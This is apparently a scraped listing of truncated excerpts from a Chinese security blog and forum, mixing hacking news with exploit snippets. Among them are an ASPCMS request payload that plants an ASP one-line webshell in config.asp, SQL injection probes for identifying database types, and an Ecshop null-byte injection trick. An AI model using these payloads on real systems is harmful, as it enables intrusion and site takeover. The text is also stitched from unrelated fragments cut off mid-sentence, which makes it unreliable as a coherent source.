初中文化的小学体育老师，发现网络游戏外挂能牟取利益，靠着自身的天赋他凭一人之力破解游戏解封包，成功制作外挂，并将外挂销售给游戏玩家牟利。20

最近一直在研究二维码，因为从生活到虚拟，很多地方都用到了二维码 今天去超市买东西，刷码结帐的时候，某个东西(饼干)，刷不到 收款员的机器上写着P

漏洞作者：360 漏洞分析：Seay 博客原文：http://www.cnseay.com/archives/2237 今天习惯性的到处逛，看看文

Ecshop支付模块注入那个漏洞 <?php $test=str_replace($_GET['a'],'',$_GET['b']); echo $test; ?> test.php?a=&b=%00' \0\' 把0给替掉 test.php?a=0&b=%00' \\' 摘自：http://zone.wooyun.org/content/2700

国外媒体称位于上海大同路边的一栋白色12层楼就是中国黑客部队总部 国防部称中国军队从未支持过任何黑客活动 【环球时报记者 段武宁 杨辉 刘畅】多家西方

英文原文：DOM Based Cross Site Scripting or XSS of the Third Kind 翻译原文：http://www.oschina.net/translate/dom-based-xss-

15日在出席一场网络安全研讨会时，白宫国家安全委员会网络协调员迈克尔·丹尼尔否认了发动网络战以应对网络安全威胁的可能。 ■ 美国电脑安全公司发布

0day/零日漏洞，一个独特的黑客文化…… 这个词从来没有过权威解释，百度百科也仅仅是解释了它在网络安全方面的含义，并没有给出这个词的来由，以

好吧，终于知道为啥好不容易发现的漏洞被修复了，原来同样也有人发现了@YY-2012 http://zone.wooyun.org/content/2512 @xsser 让发布下截图交流下。。 首先说明这是一个2012年左右的

他姓陶，今年35岁，云和县人，高中学历，他是个电脑奇才，无师自通，看几本书就能上机操作编程，可惜，他的天才，似乎总用在错误的地方。 三年前，因

2月18日消息，据国外媒体报道，德国研究人员近日在对三星Galaxy Nexus的测试中发现，在进行冷冻之后，可以绕过加密措施获取手机中的数据

一项即将出台的新标准将使手机、电脑厂商有机会消灭用户密码被盗问题。 虽然我们的生活中充满了各种密码，但是用来保护网络帐号却并不安全。消灭密码或

被攻击也在扎克伯格意料之中，这也许是黑客对于这家崇尚黑客文化的公司的一种调侃。 北京时间2月16日消息，据国外媒体报道，Facebook周五声

嗯，春节期间比较忙（你懂的），很少更新博客，年后恢复正常…… 本站创建于2010年04月30日，截至当前： 运行时长：1019 天、7 小时、48 分

腾讯科技讯（云起）北京时间2月11日消息 Twitter最新发布消息证实发现黑客入侵，已经重设自动登入系统，并发送电子邮件至约25万个受影响的

很久很久以前，有一群人，他们决定用8个可以开合的晶体管来组合成不同的状态，以表示世界上的万物。他们看到8个开关状态是好的，于是他们把这称为"

讨论：由多个独立站长/志愿者互相共享空闲服务器资源组建巨型类CDN云网络的可行性 在这个帖子中“ip小偷是什么屌程序？网站自动换IP，每次IP

前几天在wooyun上发布了个漏洞：WooYun: PHP safe_mode等安全配置绕过 这里有一些有意思的地方，主站不方便讨论，发到zone里做

一个注射点如何最快速确认是什么类型数据库 xsser (十根阳具有长短!!) | 2013-02-05 12:36 假设这么一个注射点： show.html?id=2 mysql:id=2 and version()>0 oracle:id=2 and '1'||'1'='11 其他的欢迎补充 1# upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47 Access: aNd aSc(cHr(97))=97 and exists(select

File:/// 苹果本周发布了一个非常“疯狂的”bug报告，就是下面这个命令，你在Mac OS X上几乎所有的软件程序窗口中输入这个命令，都会导致软件崩溃。无论

在某些溢出成功后，我们需要运行自己的模块，如远控、扫描器等，可以使用下面的一些方法： 0x01.利用其他后渗透模块驱动执行，如使用meterp

首发T00ls 不知道书能不能给一本， 0xSafes Team j8g 出现在评论处，小问题。放出来怕笑话呢。。 }elseif($do == 'view'){ require_once(dirname(__FILE__)."/global.php"); require_once(MYMPS_INC."/member.class.php"); require_once(MYMPS_INC."/ip.class.php"); if(!empty($part)&&$action == 'write'){ if(if_other_site_post()){ $msgs[]="请不要尝试从站外提交

声明: 此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)! 请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵

拿webshell方法没有任何技术含量。。网上有很多类似的。 ，但是，这个见网上也没有，自己刚好在一次拿webshell过程中发现的，于是就发

老的ASPCMS版本的秒杀拿SHELL漏洞 找到后台。。。然后 /admin/_system/AspCms_SiteSetting.asp?action=saves 直接POST runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1 再连接配置文件config.asp 密码为# 摘自：https://

这是早期逆向 lslsass32.exe  的一份代码  大概为完整代码的95%   

原文:http://www.quotium.com/research/advisories/XSS-NetRequestValidation

不知道大家有多少人知道这个方法了，就是一个判断WEB目录是否真实存在的方法。鄙人抛砖引玉，希望会诞生更好的扫描器。 下面说一下这个判断的小技巧

乌云看到个帖子，这里大概讲一下…… 求科普，ip小偷是什么屌程序？ 小A (专注。) | 2013-01-29 00:33 求科普~~~介个是什么程序？？？？ 据说是一种域名自动更换

前段时间和骗子对决了一番  哈哈  真有意思 那时候就是为了运行各种可疑程序安装了虚拟机 今天就是用上了 是一个QQ刷钻的 hxxp://www.5173.com.js-20130109-169535.wanmaoxa.net/index.asp?id=1007 腾讯Q